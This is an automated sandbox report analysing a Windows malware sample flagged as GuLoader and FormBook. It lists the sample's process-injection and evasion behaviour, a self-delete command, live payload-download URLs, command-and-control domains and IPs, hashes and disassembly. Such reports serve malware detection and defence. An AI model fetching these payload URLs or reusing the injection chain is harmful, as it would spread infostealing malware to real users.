Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]	15_2_04FD4A2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9E620 mov eax, dword ptr fs:[00000030h]	15_2_04F9E620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]	15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]	15_2_04FCA61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB3A1C mov eax, dword ptr fs:[00000030h]	15_2_04FB3A1C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]	15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov ecx, dword ptr fs:[00000030h]	15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]	15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]	15_2_04F95210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]	15_2_04F9AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]	15_2_04F9AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA8A0A mov eax, dword ptr fs:[00000030h]	15_2_04FA8A0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]	15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]	15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]	15_2_04F9C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC8E00 mov eax, dword ptr fs:[00000030h]	15_2_04FC8E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD37F5 mov eax, dword ptr fs:[00000030h]	15_2_04FD37F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05051608 mov eax, dword ptr fs:[00000030h]	15_2_05051608
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBDBE9 mov eax, dword ptr fs:[00000030h]	15_2_04FBDBE9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]	15_2_04FC03E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504FE3F mov eax, dword ptr fs:[00000030h]	15_2_0504FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]	15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]	15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]	15_2_04FC4BAD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05024257 mov eax, dword ptr fs:[00000030h]	15_2_05024257
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]	15_2_0504B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]	15_2_0504B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068A62 mov eax, dword ptr fs:[00000030h]	15_2_05068A62
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC2397 mov eax, dword ptr fs:[00000030h]	15_2_04FC2397
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCB390 mov eax, dword ptr fs:[00000030h]	15_2_04FCB390
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA8794 mov eax, dword ptr fs:[00000030h]	15_2_04FA8794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]	15_2_04FA1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]	15_2_04FA1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0502FE87 mov eax, dword ptr fs:[00000030h]	15_2_0502FE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h]	15_2_04FC3B7A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC3B7A mov eax, dword ptr fs:[00000030h]	15_2_04FC3B7A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9DB60 mov ecx, dword ptr fs:[00000030h]	15_2_04F9DB60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAFF60 mov eax, dword ptr fs:[00000030h]	15_2_04FAFF60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9F358 mov eax, dword ptr fs:[00000030h]	15_2_04F9F358
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]	15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]	15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05060EA5 mov eax, dword ptr fs:[00000030h]	15_2_05060EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050146A7 mov eax, dword ptr fs:[00000030h]	15_2_050146A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F9DB40 mov eax, dword ptr fs:[00000030h]	15_2_04F9DB40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAEF40 mov eax, dword ptr fs:[00000030h]	15_2_04FAEF40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0504FEC0 mov eax, dword ptr fs:[00000030h]	15_2_0504FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCE730 mov eax, dword ptr fs:[00000030h]	15_2_04FCE730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068ED6 mov eax, dword ptr fs:[00000030h]	15_2_05068ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h]	15_2_04F94F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F94F2E mov eax, dword ptr fs:[00000030h]	15_2_04F94F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FBF716 mov eax, dword ptr fs:[00000030h]	15_2_04FBF716
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h]	15_2_04FCA70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA70E mov eax, dword ptr fs:[00000030h]	15_2_04FCA70E

Source: C:\Windows\SysWOW64\cmmon32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 0_2_022BC135 LdrInitializeThunk,

0_2_022BC135

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe	Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe	Network Connect: 172.67.161.80 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: E90000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3472	Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'			Jump to behavior

Source: explorer.exe, 0000000C.00000000.603358664.0000000005EA0000.00000004.00000001.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000C.00000000.572074802.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000C.00000000.598822836.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 0000000F.00000002.770536631.0000000003810000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: RYATPPETU.exe PID: 2248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmmon32.exe PID: 5516, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery421	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	System Information Discovery12	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RYATPPETU.exe	32%	Virustotal		Browse
RYATPPETU.exe	27%	ReversingLabs	Win32.Trojan.GuLoader
RYATPPETU.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
15.2.cmmon32.exe.549f840.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.2.cmmon32.exe.3254318.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.2.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.3.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
8.0.RYATPPETU.exe.400000.1.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
0.0.RYATPPETU.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
blumeconstructionllc.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://blumeconstructionllc.com/bin_NX	0%	Avira URL Cloud	safe
https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe
https://soleprotect.de/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe
www.lrbounee.xyz/kb8y/	0%	Avira URL Cloud	safe
https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.lrbounee.xyz	172.67.161.80	true	true		unknown
blumeconstructionllc.com	45.82.177.176	true	true	0%, Virustotal, Browse	unknown
www.etr6safvu8.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://blumeconstructionllc.com/bin_NX	true	Avira URL Cloud: safe	unknown
www.lrbounee.xyz/kb8y/	true	Avira URL Cloud: safe	low
https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin	RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soleprotect.de/bin_NXOEaeagUq10.bin	RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.82.177.176	blumeconstructionllc.com	Netherlands		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
172.67.161.80	www.lrbounee.xyz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510462
Start date:	27.10.2021
Start time:	20:13:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RYATPPETU.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/1@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 48.5% (good quality ratio 39.9%) Quality average: 67% Quality standard deviation: 36.2%
HCA Information:	Successful, ratio: 61% Number of executed functions: 69 Number of non-executed functions: 13
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 20.189.173.21, 23.211.4.86 Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	Software updated by Dylox.exe	Get hash	malicious	Browse	185.203.240.16
	Genshin Hack v2.0.exe	Get hash	malicious	Browse	185.209.22.181
	FortniteModMenuInstallerV3.1.exe	Get hash	malicious	Browse	185.209.22.181
	HershyMM.exe	Get hash	malicious	Browse	185.209.22.181
	VapeClient.exe	Get hash	malicious	Browse	185.209.22.181
	PrimoHack.exe	Get hash	malicious	Browse	185.154.13.159
	GenshinHack.exe	Get hash	malicious	Browse	185.209.22.181
	Bitcoin Mining Software 1.5v.exe	Get hash	malicious	Browse	185.209.22.181
	3627seCzVp.exe	Get hash	malicious	Browse	92.119.113.189
	In8IsU6U9f.exe	Get hash	malicious	Browse	92.119.113.189
	DHL invoice KULIR00895239.pdf.exe	Get hash	malicious	Browse	80.89.235.209
	JMGEUaWEGo.exe	Get hash	malicious	Browse	185.213.211.110
	0sbusFRRjn.exe	Get hash	malicious	Browse	45.81.226.106
	B8s1kaAQnJ.exe	Get hash	malicious	Browse	185.209.22.181
	VYGellievj.exe	Get hash	malicious	Browse	185.244.217.5
	MVB56JJDeJ.exe	Get hash	malicious	Browse	185.244.217.166
	9h0UloHVo8.exe	Get hash	malicious	Browse	176.57.71.68
	AxieLoader.exe	Get hash	malicious	Browse	185.209.22.181
	VngAM1gAM3.exe	Get hash	malicious	Browse	80.89.234.187
	xTvIsmAee2.exe	Get hash	malicious	Browse	45.147.197.20
CLOUDFLARENETUS	bdumk5V3ry.exe	Get hash	malicious	Browse	172.67.188.154
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse	104.21.19.200
	sboPQqfpHN.exe	Get hash	malicious	Browse	162.159.134.233
	CtTYTpaAKA.exe	Get hash	malicious	Browse	172.67.216.2
	6TUQ9Lb5rN.exe	Get hash	malicious	Browse	172.67.190.175
	ezzvG6vQ5l.exe	Get hash	malicious	Browse	172.67.195.238
	Eh36aKpvNOXJcT8.exe	Get hash	malicious	Browse	104.21.19.200
	2098765434567890098765.exe	Get hash	malicious	Browse	172.67.188.154
	0987234567890.exe	Get hash	malicious	Browse	172.67.188.154
	LENEEsYC55YCboo.exe	Get hash	malicious	Browse	104.21.19.200
	oytu1F59dV.exe	Get hash	malicious	Browse	162.159.134.233
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	162.159.134.233
	Betalingskvittering.exe	Get hash	malicious	Browse	104.21.40.182
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	162.159.130.233
	10272021-AM65Application.HTM	Get hash	malicious	Browse	104.18.11.207
	x86_64	Get hash	malicious	Browse	104.28.249.1
	calculadora-trading-criptomonedas-binance-1 (1).apk	Get hash	malicious	Browse	172.67.169.191
	calculadora-trading-criptomonedas-binance-1 (1).apk	Get hash	malicious	Browse	172.67.169.191
	Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exe	Get hash	malicious	Browse	162.159.133.233
	GAWEVQV50254.vbs	Get hash	malicious	Browse	104.21.41.22

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	45.82.177.176
	3weZ3HvFxH.exe	Get hash	malicious	Browse	45.82.177.176
	89764583937678458745989.html	Get hash	malicious	Browse	45.82.177.176
	10272021-AM65Application.HTM	Get hash	malicious	Browse	45.82.177.176
	protocol-1441399238.xls	Get hash	malicious	Browse	45.82.177.176
	Justificante de pago 876345864792456647625346347457453535.vbs	Get hash	malicious	Browse	45.82.177.176
	Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exe	Get hash	malicious	Browse	45.82.177.176
	protocol-1086855687.xls	Get hash	malicious	Browse	45.82.177.176
	v2c.exe	Get hash	malicious	Browse	45.82.177.176
	sZFzUPz7Ee.exe	Get hash	malicious	Browse	45.82.177.176
	eMxXqjzvae.exe	Get hash	malicious	Browse	45.82.177.176
	1.xls	Get hash	malicious	Browse	45.82.177.176
	f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exe	Get hash	malicious	Browse	45.82.177.176
	8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exe	Get hash	malicious	Browse	45.82.177.176
	xmzY7ZAuZp.exe	Get hash	malicious	Browse	45.82.177.176
	d3vBGwu0wz.exe	Get hash	malicious	Browse	45.82.177.176
	aVBJuotMJ9.exe	Get hash	malicious	Browse	45.82.177.176
	5xPl3ZUYqx.exe	Get hash	malicious	Browse	45.82.177.176
	ATT51656.htm	Get hash	malicious	Browse	45.82.177.176
	FWWg6C0DM4.exe	Get hash	malicious	Browse	45.82.177.176

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP Download File
Process:	C:\Users\user\Desktop\RYATPPETU.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.4059290877904689
Encrypted:	false
SSDEEP:	48:rNlBAWKrwJT+zB0s48oBTAtLSllRGn4Zs:5lAk9UL48GMElRA
MD5:	2832C86BFA5DF1B4F0161397CF870C59
SHA1:	A75FBED32EC9920AAC454561327EE6D301B752D1
SHA-256:	33E5839910635EA050F70D96AA0A6EB468D0920A606382884D6CDC4B368421A7
SHA-512:	844156D22C9FD5E36D0F14DB6841F1F4A7DCF4F8BFA09CADA6314020EC6F8740A2C9665DB60D33EFDB7B84894901725DF7967770C220218BEB557D91E13679D1
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.09284402252112
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RYATPPETU.exe
File size:	131072
MD5:	7a4b8b634d2e94cd1e458af5918be3aa
SHA1:	b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256:	056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
SHA512:	2388a76b5735ef5d9a0019fc88b8ddb9f4eb1fccf894e7352a178292187d84ba70d8388c56d2aad4d75309cbd2892c0283cb950cea8fadefb76053eff76c2af0
SSDEEP:	1536:QYT1mygowE78xN6Lr82r/GBWHQo5626Xx5aRx:10o5YirXzGYHB56Xxg3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L....F.H.....................@......0.............@........................

File Icon


Icon Hash:	12f1f8deacde6cb0

Static PE Info

General
Entrypoint:	0x401130
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48934696 [Fri Aug 1 17:23:34 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a69b89976d9c4cd319442a092a90877e

Entrypoint Preview

Instruction
push 004026D8h
call 00007F3B7CA3DED3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dh, al
dec ebx
or byte ptr [eax+edi*2], dh
jle 00007F3B7CA3DF16h
inc edx
mov ch, 68h
cmp ch, byte ptr [ebx+2Bh]
salc
loopne 00007F3B7CA3DF26h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ebx
outsd
insd
insd
outsd
outsd
jc 00007F3B7CA3DF47h
